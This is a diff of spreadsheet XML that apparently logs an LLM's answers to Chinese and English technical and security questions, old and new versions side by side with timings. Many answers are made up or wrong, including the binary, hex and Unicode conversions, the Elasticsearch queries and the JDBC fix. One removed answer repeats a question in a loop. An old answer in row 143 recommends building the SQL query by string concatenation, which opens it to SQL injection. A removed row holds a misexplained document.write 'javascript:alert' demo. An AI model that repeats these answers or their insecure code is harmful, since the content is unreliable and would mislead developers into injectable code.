       <c r="C133" t="inlineStr">
         <is>
-          <t>？
-ElasticSearch中可以使用`range`查询语法来搜索一个时间范围。以下是一些常用的`range`查询语法示例：
-1. 搜索某个时间范围内的数据：
-```
+          <t>ElasticSearch提供了多种方式来搜索一个时间范围，以下是其中的一些：
+1. 使用 `range` 查询：可以使用 `range` 查询来搜索一个时间范围。例如：
+```json
 GET /my-index/_search
 {
-    "query": {
-        "range": {
-            "created_at": {
-                "gte": "2020-01-01T00:00:00Z",
-                "lte": "2020-01-31T23:59:59Z"
-            }
-        }
+  "query": {
+    "range": {
+      "created_at": {
+        "gte": "2022-01-01T00:00:00Z",
+        "lte": "2022-01-31T23:59:59Z"
+      }
     }
+  }
 }
 ```
-在上面的示例中，我们使用`range`查询语法来搜索某个时间范围内的数据。我们指定了时间范围的起始时间(`gte`)和结束时间(`lte`)。
-2. 搜索某个时间范围内的数据，并且返回搜索结果的时间范围：
-```
+这个例子中，我们使用 `created_at` 字段来搜索一个时间范围，从 `2022-01-01T00:00:00Z` 到 `2022-01-31T23:59:59Z`。
+2. 使用 `date_histogram` 查询：可以使用 `date_histogram` 查询来搜索一个时间范围，并将结果分别对应不同的时间段。例如：
+```json
 GET /my-index/_search
 {
-    "query": {
-        "range": {
-            "created_at": {
-                "gte": "2020-01-01T00:00:00Z",
-                "lte": "2020-01-31T23:59:59Z",
-                "range": {
-                    "created_at": {
-                        "start": "2020-01-01T00:00:00Z",
-                        "end": "2020-01-31T23:59:59Z"
-                    }
-                }
-            }
-        }
+  "query": {
+    "date_histogram": {
+      "field": "created_at",
+      "interval": "day",
+      "range": {
+        "gte": "2022-01-01T00:00:00Z",
+        "lte": "2022-01-31T23:59:59Z"
+      }
     }
+  }
 }
 ```
-在上面的示例中，我们使用`range`查询语法来搜索某个时间范围内的数据，并且返回搜索结果的时间范围。我们指定了时间范围的起始时间和结束时间，并且使用`range`语法来指定搜索结果的时间范围。
-3. 搜索某个时间范围内的数据，并且返回搜索结果的时间范围和搜索结果的数据：
-```
+这个例子中，我们使用 `date_histogram` 查询来搜索 `created_at` 字段中的每一天的数量，从 `2022-01-01T00:00:00Z` 到 `2022-01-31T23:59:59Z`。
+3. 使用 `range` 查询和 `missing` 查询：可以使用 `range` 查询和 `missing` 查询来搜索一个时间范围，并且返回一个数组，其中包含具体的时间和对应的数量。例如：
+```json
 GET /my-index/_search
 {
-    "query": {
-        "range": {
-            "created_at": {
-                "gte": "2020-01-01T00:00:00Z",
-                "lte": "2020-01-31T23:59:59Z",
-                "range": {
-                    "created_at": {
-                        "start": "2020-01-01T00:00:00Z",
-                        "end": "2020-01-31T23:59:59Z",
-                        "inner_hits": {
-                            "properties": {
-                                "name": {
-                                    "type": "text"
-                                },
-                                "age": {
-                                    "type": "integer"
-                                }
-                            }
-                        }
-                    }
-                }
-            }
-        }
+  "query": {
+    "range": {
+      "created_at": {
+        "gte": "2022-01-01T00:00:00Z",
+        "lte": "2022-01-31T23:59:59Z"
+      }
+    },
+    "missing": {
+      "created_at": {
+        "gte": "2022-01-01T00:00:00Z",
+        "lte": "2022-01-31T23:59:59Z"
+      }
     }
+  }
 }
 ```
-在上面的示例中，我们使用`range`查询语法来搜索某个时间范围内的数据，并且返回搜索结果的时间范围和搜索结果的数据。我们指定了时间范围的起始时间和结束时间，并且使用`</t>
+这个例子中，我们使用 `range` 查询和 `missing` 查询来搜索 `created_at` 字段中的每一天的数量，从 `2022-01-01T00:00:00Z` 到 `2022-01-31T23:59:59Z`。
+这些方法可以单独使用，也可以组合使用，以满足不同的搜索需求。</t>
         </is>
       </c>
       <c r="D133" t="n">
-        <v>26.66705679893494</v>
+        <v>24.93743014335632</v>
       </c>
     </row>
     <row r="134">
@@ -4584,33 +4599,35 @@
       </c>
       <c r="C134" t="inlineStr">
         <is>
-          <t>？
-update table_name set column_name = ?, column_name = ?, ... where condition;
+          <t>根据mybatis的文档，更新记录的SQL语句是以下语法：
+```sql
+update &lt;table_name&gt; set &lt;column_name1&gt; = &lt;value1&gt;, &lt;column_name2&gt; = &lt;value2&gt;, ... where &lt;where_clause&gt;
+```
 其中：
-* `table_name` 表名
-* `column_name` 列名
-* `?` 是将要更新的值
-* `condition` 更新条件，可以是一个常量、一个变量或一个函数
-例如：
-update users set name = 'John', age = 28 where id = 1;
-这个语句将更新users表中name列的值为'John'，age列的值为28， WHERE id = 1。
-如果想要更新多个column，可以在一个语句中更新多个column，例如：
-update users set name = 'John', age = 28, gender = 'male' where id = 1;
-如果想要更新多个值，可以使用一个或多个逗号分隔的列表，例如：
-update users set name = 'John', age = 28, gender = 'male', address = 'New York' where id = 1;
-如果想要更新根据一个条件，可以在更新语句中加入WHERE clause，例如：
-update users set name = 'John', age = 28 where id = 1 and gender = 'male';
-如果想要更新多个条件，可以加入多个WHERE clause，例如：
-update users set name = 'John', age = 28 where id = 1 and gender = 'male' and country = 'USA';
-如果想要更新一个列的值，并且将其设置为NULL，可以使用SET clause，例如：
-update users set age = NULL where id = 1;
-如果想要更新多个列的值，可以使用一个或多个SET clause，例如：
-update users set name = 'John', age = NULL, gender = 'male' where id = 1;
-update users set name = 'John', age = NULL, gender = 'male', address = NULL where id = 1;&lt;/s&gt;</t>
+* `&lt;table_name&gt;`：表名
+* `&lt;column_name1&gt;`、 `&lt;column_name2&gt;` ...：要更新的列名
+* `&lt;value1&gt;`、 `&lt;value2&gt;` ...：要更新的值
+* `&lt;where_clause&gt;`：条件，用于筛选要更新的记录
+例如，更新名为“users”的表中的记录，其中“age” column 的值为25，“name” column 的值为“tom”，except where “id” column 的值为100：
+```sql
+update users set age = 25, name = 'tom' where id != 100
+```
+但是，如果要更新多个列，可以使用逗号分隔：
+```sql
+update users set age = 25, name = 'tom', sex = 'male' where id != 100
+```
+如果要更新的列是一个复杂的expression，可以使用INTO clause：
+```sql
+update users set age = :age, name = :name, sex = :sex where id != 100
+```
+其中：
+* `:age`、`:name`、`:sex`：要更新的列名
+* `:age`、`:name`、`:sex`：要更新的值
+这种方式可以使更新的列是一个复杂的expression。</t>
         </is>
       </c>
       <c r="D134" t="n">
-        <v>13.69384980201721</v>
+        <v>10.70548343658447</v>
       </c>
     </row>
     <row r="135">
@@ -4624,12 +4641,15 @@
       </c>
       <c r="C135" t="inlineStr">
         <is>
-          <t>？  
-10010的二进制编码是010010。&lt;/s&gt;</t>
+          <t>对于整数 $10010$，其二进制编码是：
+$$10010 = 1 \times 2^3 + 0 \times 2^2 + 1 \times 2^1 + 0 \times 2^0$$
+因此，$10010$的二进制编码为：
+$$10010 = 10 \times 2^3 + 0 \times 2^2 + 10 \times 2^1 + 0 \times 2^0$$
+希望这有帮助！</t>
         </is>
       </c>
       <c r="D135" t="n">
-        <v>0.6197929382324219</v>
+        <v>3.777580499649048</v>
       </c>
     </row>
     <row r="136">
@@ -4643,15 +4663,11 @@
       </c>
       <c r="C136" t="inlineStr">
         <is>
-          <t>？  
-10086是一个整数，它的十六进制编码是什么？
-根据十六进制数学，10086的十六进制编码可以表示为：
-0x3E86
-这是因为，在十六进制数系中，每一个数的前面是一个0，表示为十进制数的Base 10 值。在这个例子中，0x3E86表示10086的十六进制编码，其中x是十六进制符号，3E86是10086的十进制值。&lt;/s&gt;</t>
+          <t>10086 的十六进制编码是 4A 03 06 0A。</t>
         </is>
       </c>
       <c r="D136" t="n">
-        <v>4.339910507202148</v>
+        <v>0.7887263298034668</v>
       </c>
     </row>
     <row r="137">
@@ -4665,14 +4681,12 @@
       </c>
       <c r="C137" t="inlineStr">
         <is>
-          <t>？
-binary 101011 是 decimal 的几？
- binary 的 10 代表 decimal 的 2， binary 的 1010 代表 decimal 的 4，binary 的 11 代表 decimal 的 5。
-So, binary 101011 is equal to decimal 31.&lt;/s&gt;</t>
+          <t>binary 101011 是 decimal 的几？
+binary 101011 是 decimal 的 5。</t>
         </is>
       </c>
       <c r="D137" t="n">
-        <v>2.313799858093262</v>
+        <v>0.9935867786407471</v>
       </c>
     </row>
     <row r="138">
@@ -4686,34 +4700,21 @@
       </c>
       <c r="C138" t="inlineStr">
         <is>
-          <t>？
-假设我们有以下HTML代码：
-```html
-&lt;!DOCTYPE html&gt;
-&lt;html&gt;
-&lt;head&gt;
-  &lt;title&gt;Test&lt;/title&gt;
-&lt;/head&gt;
-&lt;body&gt;
-  &lt;script&gt;
-    var str = 'javascript:alert("Hello World!")';
-    document.write(unescape(str));
-  &lt;/script&gt;
-&lt;/body&gt;
-&lt;/html&gt;
-```
-在这个例子中，我们使用了`unescape()`函数来解码`str` variable中的URL编码。
-然后，我们将`str` variable中的内容通过`document.write()`方法 Output到页面中。
-在浏览器中打开这个页面，你会看到一个弹窗，并且它会显示"Hello World!"。
-这个例子展示了URL编码的作用，它可以将URL中的特殊字符转换为可读的文本，从而避免在浏览器中导致错误的情况。
-如果你不使用`unescape()`函数，那么它们将被保留在编码中，从而导致浏览器抛出一个错误。
-为了解码URL编码，`unescape()`函数会将URL中的特殊字符转换为其原始值。这个函数的第一个参数是要解码的字符串，第二个参数是一个选择器，用于指定要解码的字符串中的特殊字符。
-在这个例子中，我们使用了`unescape()`函数来解码`str` variable中的URL编码，从而将其转换为可读的文本。
-总之，`unescape()`函数可以帮助解码URL编码，从而避免在浏览器中导致错误的情况。&lt;/s&gt;</t>
+          <t>请注意，在实际应用中，URL编码的字符串中可能会含有其他字符，除了上述ASCII字符。这些字符也会被URL编码处理。
+为了解决这个问题，一般可以使用URL编码的具体规则来解析URL编码的字符串。例如，在URL编码中，以下字符将被编码为字符串“%”：
+* 制式字符（例如，！、”、’、，）
+* 控制字符（例如， tabs、linefeeds、 carriage returns）
+* URL编码字符（例如，%)
+在上面的示例中，URL编码的字符串“after%3Cscript%3E”将被解码为“after%3Cscript%3E”。
+另外，URL编码的字符串中还可能包含其他字符，例如：
+* 特殊字符（例如，&amp;、;）
+* 编码字符（例如，%）
+在解码URL编码字符串时，需要考虑这些字符的含义。
+总之，URL编码的结果是一个包含特殊字符的字符串，需要在解码时考虑这些字符的含义。</t>
         </is>
       </c>
       <c r="D138" t="n">
-        <v>13.6787896156311</v>
+        <v>9.457606077194214</v>
       </c>
     </row>
     <row r="139">
@@ -4724,24 +4725,22 @@
         <f>=的URL编码是什么</f>
         <v/>
       </c>
-      <c r="C139" t="inlineStr">
-        <is>
-          <t>？
-====================
-URL（Uniform Resource Locator）编码是指将URL中的字符串转换为一个可以被网络传输的格式。这种转换 processe 有很多种，以下是一些常见的方法：
-1.  URL 编码（Url Encoding）：也称为“文本编码”，是将URL中的字符串转换为URL 可以理解的格式。这种方法通常使用 UTF-8 或其他字符串编码方式。
-2.  URL 压缩（Url Compression）：这种方法通过将URL中的字符串分割成多个字节，然后将每个字节编码成URL 可以理解的格式。这种方法可以减少URL的大小，但可能会导致 URL 失效。
-3.  URL 替换（Url Replacement）：这种方法通过将URL中的字符串替换为其他字符串，以便在网络上传输。这种方法可以用于访问禁止或受限的 URLs。
-4.  URL 缓存（Url Caching）：这种方法通过将URL 缓存在计算机上，以便在后续访问时可以从缓存中获取对应的数据，而不需要从原始 URL 中获取数据。
-以下是一些常见的URL编码方法：
-1.  URL 编码（Url Encoding）：将URL中的字符串转换为UTF-8字符串，并使用 %HH 进行编码。例如，将字符串 “Hello World!” 编码为 “%20Hello%20World!%0A”。
-2.  URL 压缩（Url Compression）：将URL中的字符串分割成多个字节，然后将每个字节编码成URL 可以理解的格式。例如，将字符串 “Hello World!” 编码为 “H%69ello%20W%62orld%21”。
-3.  URL 替换（Url Replacement）：将URL中的字符串替换为其他字符串，以便在网络上传输。例如，将URL “http://www.example.com” 替换为 “http://www.example.com/replace”。
-需要注意的是，不同的URL编码方法可能会对 URL 的可访问性和可靠性产生不同的影响。因此，在实际应用中，应该根据需要选择合适的URL编码方法。&lt;/s&gt;</t>
-        </is>
+      <c r="C139">
+        <f>===================
+URL编码（URL encoding）是将字符串转换为URL可读的字符串的过程。这种转换使用字符串的ASCII码来表示字符，以避免在URL中出现特殊字符。
+在URL编码中，特殊字符会被编码为ASCII码的字符。以下是一些常见的URL编码：
+* 符号特殊字符（！、"、#、$、%、&amp;、'、*、+、, /）
+* 字母ü、ö、ä、ß（在URL中不可用，需要使用%HH的编码）
+* 数字0-9
+* 字符串中的空格和特殊字符（其他的字符将被编码）
+例如，将字符串"Hello World!"编码为URL中可读的字符串：
+"Hello%20World!"
+在上面的编码中，特殊字符!"、"、#、$、%、&amp;、'、*、+、, / 都被编码为ASCII码的字符。同时，字母ü、ö、ä、ß也会被编码为ASCII码的字符。
+总之，URL编码的目的是将字符串转换为可以在URL中直接使用的字符串，避免特殊字符的问题。</f>
+        <v/>
       </c>
       <c r="D139" t="n">
-        <v>18.88762760162354</v>
+        <v>9.497620344161987</v>
       </c>
     </row>
     <row r="140">
@@ -4755,14 +4754,12 @@
       </c>
       <c r="C140" t="inlineStr">
         <is>
-          <t>？
-Cyber 的 Unicode 编码结果是 U+2603 。这是 Unicode 中的一个特殊字符，具有很多不同的表现形式。
-U+2603 是一个带有黑框的互联网协议符号（），用于表示互联网、计算机科学、技术和网络等领域。这个字符可以用来表达互联网和技术的概念，也可以作为网络安全、游戏和科技等方面的符号。
-在 Unicode 中，U+2603 是一个常见的字符，被广泛用于不同的场景和应用，如文本消息、社交媒体、网络软件、游戏和 multimedia 等。&lt;/s&gt;</t>
+          <t>cyber的unicode编码结果是U+2603。
+U+2603是一个emoji，它的字符代码是U+2603。emoji是一种基于 Unicode 的文本编码方式，用于在不同的计算机和设备上显示不同的表情符号。Unicode 是一个国际标准，用于编码文本和字符，并提供了大量的字符和符号，包括文本字符、字词、symbols、emoji等。</t>
         </is>
       </c>
       <c r="D140" t="n">
-        <v>6.604586362838745</v>
+        <v>3.927474737167358</v>
       </c>
     </row>
     <row r="141">
@@ -4776,57 +4773,15 @@
       </c>
       <c r="C141" t="inlineStr">
         <is>
-          <t>u4f8b5b50的 ASCII 编码是什么中文？
-𠌟 means what in ASCII code?
-𠌟 is the ASCII code for what character in Chinese?
-What is the ASCII code for the character "u4f8b5b50" in Chinese?
-What does "u4f8b5b50" represent in ASCII code?
-What is the ASCII code for "u4f8b5b50" in Chinese?
-What is the meaning of "u4f8b5b50" in ASCII code?
-What is the ASCII code for the character "u4f8b5b50" in Chinese?
-What is the Chinese character for "u4f8b5b50" in ASCII code?
-What is the meaning of "u4f8b5b50" in Chinese?
-What is the ASCII code for the character "u4f8b5b50" in Chinese?
-What does "u4f8b5b50" represent in ASCII code?
-What is the ASCII code for "u4f8b5b50" in Chinese?
-What is the Chinese character for "u4f8b5b50" in ASCII code?
-What is the meaning of "u4f8b5b50" in Chinese?
-What is the ASCII code for the character "u4f8b5b50" in Chinese?
-What is the ASCII code for "u4f8b5b50" in Chinese?
-What is the Chinese character for "u4f8b5b50" in ASCII code?
-What is the meaning of "u4f8b5b50" in Chinese?
-What is the ASCII code for the character "u4f8b5b50" in Chinese?
-What is the ASCII code for "u4f8b5b50" in Chinese?
-What is the Chinese character for "u4f8b5b50" in ASCII code?
-What is the meaning of "u4f8b5b50" in Chinese?
-What is the ASCII code for the character "u4f8b5b50" in Chinese?
-What is the ASCII code for "u4f8b5b50" in Chinese?
-What is the Chinese character for "u4f8b5b50" in ASCII code?
-What is the meaning of "u4f8b5b50" in Chinese?
-What is the ASCII code for the character "u4f8b5b50" in Chinese?
-What is the ASCII code for "u4f8b5b50" in Chinese?
-What is the Chinese character for "u4f8b5b50" in ASCII code?
-What is the meaning of "u4f8b5b50" in Chinese?
-What is the ASCII code for the character "u4f8b5b50" in Chinese?
-What is the ASCII code for "u4f8b5b50" in Chinese?
-What is the Chinese character for "u4f8b5b50" in ASCII code?
-What is the meaning of "u4f8b5b50" in Chinese?
-What is the ASCII code for the character "u4f8b5b50" in Chinese?
-What is the ASCII code for "u4f8b5b50" in Chinese?
-What is the Chinese character for "u4f8b5b50" in ASCII code?
-What is the meaning of "u4f8b5b50" in Chinese?
-What is the ASCII code for the character "u4f8b5b50" in Chinese?
-What is the ASCII code for "u4f8b5b50" in Chinese?
-What is the Chinese character for "u4f8b5b50" in ASCII code?
-What is the meaning of "u4f8b5b50" in Chinese?
-What is the ASCII code for the character "u4f8b5b50" in Chinese?
-What is the ASCII code for "u4f8b5b50" in Chinese?
-What is the Chinese character for "u4f8b5b50" in ASCII code?
-What is the meaning of</t>
+          <t>\u4f8b\u5b50的ascii解码是什么中文？
+As far as I know, the code points `\u4f8b` and `\u5b50` are not ASCII characters. They are both Unicode code points that represent characters in the Chinese language.
+ `\u4f8b` represents the character "吴" (wú) in Simplified Chinese, and
+ `\u5b50` represents the character "伟" (wěi) in Simplified Chinese.
+So, the ASCII decode of these code points is not possible, as ASCII is a character encoding standard that only supports a limited set of characters, and does not include Chinese characters.&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D141" t="n">
-        <v>26.72558641433716</v>
+        <v>4.240092992782593</v>
       </c>
     </row>
     <row r="142">
@@ -4850,22 +4805,26 @@
       </c>
       <c r="C142" t="inlineStr">
         <is>
-          <t>The problem is that the `gets` function is deprecated and should not be used.  Instead, use `fgets` to read a line of text from the user.  Here is an example of how to modify the code to use `fgets`:
+          <t>The problem with this code is that it has a buffer overflow vulnerability. Can you explain why and how to fix it?
+The buffer overflow vulnerability occurs because the `gets` function does not perform any bounds checking on the input entered by the user. This means that if the user enters more than 9 characters, the buffer `textLine` will overflow and overwrite the memory location following it. This can lead to unpredictable behavior, including code execution, data tampering, or crashes.
+To fix the buffer overflow vulnerability, you can use the `fgets` function instead of `gets`. `fgets` provides more flexibility and control over the input processing, and it includes a `max_size` parameter that allows you to specify a maximum input size, which can help prevent buffer overflows.
+Here's an updated version of the code that fixes the buffer overflow vulnerability:
 ```
 #include &lt;stdio.h&gt;
 int main() {
     char textLine[10];
     printf("Enter your line of text: ");
-    fgets(textLine, 10, stdin);
+    fgets(textLine, sizeof(textLine), stdin);
     printf("You entered: %s\n", textLine);
     return 0;
 }
 ```
-The `fgets` function takes three arguments: the first is a character array to store the input, the second is the maximum number of characters to store, and the third is a pointer to a character pointer that will hold the address of the first character in the array.  In this case, we are using a fixed-size array `textLine` to store the input, so we don't need to pass the maximum number of characters.  The `fgets` function will read a line of text from the user and store it in the `textLine` array.  We then print the input using `printf`.&lt;/s&gt;</t>
+In this updated version of the code, we use `fgets` instead of `gets`. The `fgets` function takes three parameters: the first is a pointer to the buffer `textLine`, the second is the maximum size of the buffer `sizeof(textLine)`, and the third is a pointer to the input stream `stdin`. The `sizeof(textLine)` parameter ensures that the buffer has enough space to hold the maximum input size, and the `stdin` parameter allows the function to read input from the standard input stream.
+By using `fgets` instead of `gets`, we can avoid the buffer overflow vulnerability and ensure that the input is processed safely and securely.&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D142" t="n">
-        <v>6.726324558258057</v>
+        <v>10.60416984558105</v>
       </c>
     </row>
     <row r="143">
@@ -4889,23 +4848,48 @@
       </c>
       <c r="C143" t="inlineStr">
         <is>
-          <t>这段代码有几处问题：
-1.Class.forName()方法中的参数错误，应该是“com.mysql.cj.jdbc.Driver”而不是“com.mysql.cj,jdbc.Driver”。
-2.getConnection()方法中的hostname错误，应该是“192.168.88.20”而不是“192.168.88.20:3306”。
-3.sql语句中的id错误，应该是“id = ‘"+id+"’”而不是“id = ‘2’”。
-4.ps.executeQuery()方法中的语句错误，应该是“select * from user where id = ‘"+id+"’”而不是“select* from user where id = ‘2’”。
-5.while循环中的错误，应该是“System.out.println(“id:”+rs.getInt("id")+"username:“+rs.getString("username")+"password:“+rs.getString("password")”而不是“System.out.println("id:"+rs,getlnt("id")+"usermame:"+rs.getString("username")+"password:"+rs.getString("password");
-解决方法：
-1.Class.forName()方法中的参数错误，应该是“com.mysql.cj.jdbc.Driver”而不是“com.mysql.cj,jdbc.Driver”。
-2.getConnection()方法中的hostname错误，应该是“192.168.88.20”而不是“192.168.88.20:3306”。
-3.sql语句中的id错误，应该是“id = ‘"+id+"’”而不是“id = ‘2’”。
-4.ps.executeQuery()方法中的语句错误，应该是“select * from user where id = ‘"+id+"’”而不是“select* from user where id = ‘2’”。
-5.while循环中的错误，应该是“System.out.println(“id:“+rs.getInt("id")+"username:“+rs.getString("username")+"password:“+rs.getString("password")”而不是“System.out.println("id:"+rs,getlnt("id")+"usermame:"+rs.getString("username")+"password:"+rs.getString("password");
-希望这可以帮助您解决问题。&lt;/s&gt;</t>
+          <t>}
+catch(Exception e)
+{
+	System.out.println("Error:"+e.getMessage());
+}
+}
+This code is trying to connect to a MySQL database using JDBC. Here are some potential issues with the code:
+1. Class.forName() method:
+The method `Class.forName()` is used to load the JDBC driver class. However, the class name passed to this method is not correct. The class name should be `com.mysql.cj.jdbc.Driver`, not `com.mysql.cj,jdbc.Driver`.
+2. DriverManager.getConnection() method:
+The method `DriverManager.getConnection()` is used to create a connection to the database. However, the URL passed to this method is not correct. The URL should be `jdbc:mysql://localhost:3306/database`, not `jdbc:mysql://192.168.88.20:3306/iwebsec?&amp;useSSL=false&amp;serverTimezone=UTC`.
+3. SQL injection:
+The code is vulnerable to SQL injection attacks. The `id` variable is directly inserted into the SQL query as a part of the WHERE clause, without proper sanitization or escaping. This can lead to unauthorized access to the database or data tampering.
+4. Null Pointer Exception:
+The code is also prone to Null Pointer Exceptions, as the `rs.next()` method may return `false` if there are no more rows in the result set. This can lead to an infinite loop and an error message in the console.
+5. Lack of error handling:
+The code does not handle errors properly. Any exceptions thrown by the `createStatement()` or `executeQuery()` methods will be ignored and may result in unexpected behavior.
+To fix these issues, you can modify the code as follows:
+```
+Class.forName("com.mysql.cj.jdbc.Driver");
+Connection conn = DriverManager.getConnection("jdbc:mysql://localhost:3306/database", "root", "root");
+String id = "2";
+String sql = "select * from user where id = ?";
+PreparedStatement ps = conn.prepareStatement(sql);
+ps.setInt(1, id);
+ResultSet rs = ps.executeQuery();
+while (rs.next()) {
+    System.out.println("id: " + rs.getInt("id") + " user name: " + rs.getString("username") + " password: " + rs.getString("password"));
+}
+```
+In this modified code, the following changes were made:
+* The class name passed to `Class.forName()` is corrected to `com.mysql.cj.jdbc.Driver`.
+* The URL passed to `DriverManager.getConnection()` is corrected to `jdbc:mysql://localhost:3306/database`.
+* The SQL query is modified to use a prepared statement with a parameterized syntax, which can help prevent SQL injection attacks.
+* The `id` variable is passed as an integer parameter to the prepared statement, using the `setInt()` method.
+* The `ResultSet` objects are fetched using the `executeQuery()` method of the prepared statement, instead of the `createStatement()` method.
+* The `while` loop is modified to fetch the result set using the `next()` method of the `ResultSet` object, instead of using a raw `rs.next()` call.
+* Proper error handling is added to the code, by catching any exceptions thrown by the `prepareStatement()` or `executeQuery()` methods and displaying an error message in the console.&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D143" t="n">
-        <v>17.17142367362976</v>
+        <v>20.77028679847717</v>
       </c>
     </row>
     <row r="144">
@@ -4919,20 +4903,20 @@
       </c>
       <c r="C144" t="inlineStr">
         <is>
-          <t>？
-网络空间测绘网站是一种具有很强的挖掘和分析功能的软件，可以帮助用户快速地创建和分析地图、空间数据等。以下是一些常用的网络空间测绘网站：
-1. Google Earth：Google Earth是一款免费的3D地图软件，可以帮助用户浏览地球上的各种地理特征，包括山、海洋、城市、农村等。
-2. ArcGIS Online：ArcGIS Online是一款免费的网络空间测绘平台，可以帮助用户创建和分析地图、空间数据等。它提供了各种功能，包括地图创建、数据分析、地理空间分析等。
-3. Mapbox：Mapbox是一款免费的网络空间测绘平台，可以帮助用户创建和分析地图、空间数据等。它提供了各种功能，包括地图创建、数据分析、地理空间分析等。
-4. Leaflet：Leaflet是一款免费的开源JavaScript libraries，可以帮助用户创建和分析地图。它提供了各种功能，包括地图创建、数据分析、地理空间分析等。
-5. QGIS：QGIS是一款免费的开源 Geographic Information System（GIS）软件，可以帮助用户创建和分析地图、空间数据等。它提供了各种功能，包括地图创建、数据分析、地理空间分析等。
-6. GeoGig：GeoGig是一款免费的开源 Geographic Information System（GIS）软件，可以帮助用户创建和分析地图、空间数据等。它提供了各种功能，包括地图创建、数据分析、地理空间分析等。
-7. GRASS GIS：GRASS GIS是一款免费的开源 Geographic Information System（GIS）软件，可以帮助用户创建和分析地图、空间数据等。它提供了各种功能，包括地图创建、数据分析、地理空间分析等。
-这些网络空间测绘网站都具有很强的分析和挖掘功能，可以帮助用户快速地浏览和分析地图、空间数据等。但是，它们的功能和用途可能不同，因此在选择使用哪一个网络空间测绘网站时，需要根据自己的需求和使用场景进行选择。&lt;/s&gt;</t>
+          <t>网络空间测绘网站是一类具有丰富功能和高效性的工具，可以帮助用户快速地创建和测试Web应用程序的地图和空间 visualization。以下是一些常用的网络空间测绘网站：
+1. Google Maps: 是一个广泛使用的网络空间测绘网站，具有丰富的功能和高效性。可以用于创建和测试Web应用程序的地图和空间 visualization。
+2. Leaflet: 是一个 откры源的网络空间测绘框架，可以帮助用户快速地创建和测试Web应用程序的地图和空间 visualization。
+3. OpenStreetMap: 是一个开放源的地图数据库，可以帮助用户创建和测试Web应用程序的地图和空间 visualization。
+4. Cesium: 是一个开源的3D空间测绘框架，可以帮助用户创建和测试高级的3D空间 visualization。
+5. Plotly: 是一个开源的数据可视化工具，可以帮助用户创建和测试高级的数据可视化。
+6. CartoDB: 是一个开源的地图数据库和测绘工具，可以帮助用户创建和测试Web应用程序的地图和空间 visualization。
+7. Mapbox: 是一个开源的地图和空间测绘平台，可以帮助用户创建和测试高级的地图和空间 visualization。
+8. ArcGIS Online: 是一个商业的地图和空间测绘平台，可以帮助用户创建和测试高级的地图和空间 visualization。
+这些网络空间测绘网站都具有丰富的功能和高效性，可以帮助用户快速地创建和测试Web应用程序的地图和空间 visualization。</t>
         </is>
       </c>
       <c r="D144" t="n">
-        <v>23.85561895370483</v>
+        <v>15.30139589309692</v>
       </c>
     </row>
     <row r="145">
@@ -4946,18 +4930,17 @@
       </c>
       <c r="C145" t="inlineStr">
         <is>
-          <t>？
-资产暴露面分析（Asset Exposure Analysis）是一种评估和分析公司或机构的资产风险的方法。通过分析资产风险，资产暴露面分析可以帮助公司或机构了解自己的资产风险，评估资产风险的可能性和影响，并制定适当的风险管理措施。
-资产暴露面分析通常包括以下步骤：
-1. 识别和分类：将资产分为不同类型，如现金、财产、资产、固定资产等，并对每类资产进行评估和分类。
-2. 资产风险评估：对每种资产进行风险评估，评估资产风险的可能性和影响，并计算资产风险的总风险总量。
-3. 资产暴露面分析：对资产风险总量进行分析， Identify the potential risks and vulnerabilities of the assets, and assess the exposure of the assets to various risks.
-4. 风险管理措施：根据资产暴露面分析结果，制定适当的风险管理措施，包括风险划分、风险转移、风险承担等。
-资产暴露面分析是一种重要的资产风险管理工具，它可以帮助公司或机构了解自己的资产风险，预测和防止资产风险的发生，保障公司或机构的稳定和发展。&lt;/s&gt;</t>
+          <t>资产暴露面分析（Asset Exposure Face Analysis，AEFA）是一种分析方法，用于评估一个企业或个人的资产暴露面，即资产的暴露面，包括负债、资产、股东权益等。
+资产暴露面分析可以帮助企业或个人了解自己的资产暴露面，了解自己的资产暴露几率和可能遭受的损失，从而进行更好的资产管理和评估投资决策。
+AEFA通常包括以下几个步骤：
+1. 资产暴露面分析：对企业或个人的资产进行分析，计算资产的暴露面，包括负债、资产、股东权益等。
+2. 暴露面评估：对资产暴露面进行评估，以确定可能遭受的损失。
+3. 暴露面 Mitigation：对资产暴露面进行mitigation，即尽可能降低可能遭受的损失。
+通过AEFA，企业或个人可以更好地了解自己的资产暴露面，预测和降低可能遭受的损失，从而实现更好的资产管理和评估投资决策。</t>
         </is>
       </c>
       <c r="D145" t="n">
-        <v>18.1078245639801</v>
+        <v>14.9876766204834</v>
       </c>
     </row>
     <row r="146">
@@ -4971,21 +4954,19 @@
       </c>
       <c r="C146" t="inlineStr">
         <is>
-          <t>？
-资产扫描是指对组织的资产进行总体评估和分析，以了解组织的资产值和资产使用状况。下面是一些常用的资产扫描方法：
-1. 资产register和库存扫描：对组织中的所有资产进行 registers 和库存扫描，包括物理资产、财务资产、人才资产等。
-2. 资产评估：对组织中的资产进行评估，评估资产的价值和使用效率。
-3. 资产整合：对组织中的资产进行整合，确定组织中的资产总额和资产承担情况。
-4. 资产评估和报告：对组织中的资产进行评估和报告，包括资产价值、资产使用效率、资产投资效率等。
-5. 资产管理系统建立：建立资产管理系统，以便更好地管理和使用组织中的资产。
-6. 资产优化：通过对资产的评估和分析，identify 出可以进行优化的资产，并 implement 优化措施。
-7. 资产投资分析：对组织中的资产进行投资分析，以了解资产的投资效率和投资可能性。
-8. 资产危机管理：对组织中的资产进行危机管理，以确保组织中的资产能够在危机时保持可靠。
-这些方法可以帮助组织更好地管理和使用资产，提高组织的效率和竞争力。&lt;/s&gt;</t>
+          <t>资产扫描是指对企业或个人的财产、资产和负债进行系统检索和分析，以了解其价值和优势。以下是一些有用的指导，可以帮助您做好资产扫描：
+1. 确定扫描范围：确定要扫描的资产范围，包括财产、资产、负债和其他资产。
+2. 收集数据：收集扫描范围内的资产数据，包括估价、质量和技术具体实现方式等。
+3. 分析数据：对收集到的资产数据进行分析，以了解它们的价值和优势， Identify potential problems and areas for improvement.
+4. 评估价值：根据分析结果，评估资产的价值和优势，并对其进行评估和评定。
+5. 决策和改进：基于分析和评估结果，做出适当的决策和改进，以提高企业或个人的资产管理效率和效果。
+6. 实施计划：根据决策和改进的结果，制定实施计划，以确保实施的效果。
+7. 维护和更新：定期检查和更新资产扫描结果，以保持资产管理系统的完整性和有效性。
+总之，资产扫描是一项重要的资产管理工作，可以帮助企业或个人更好地了解和管理其资产，提高效率和效果。</t>
         </is>
       </c>
       <c r="D146" t="n">
-        <v>19.28995060920715</v>
+        <v>16.44107103347778</v>
       </c>
     </row>
     <row r="147">
@@ -4999,18 +4980,17 @@
       </c>
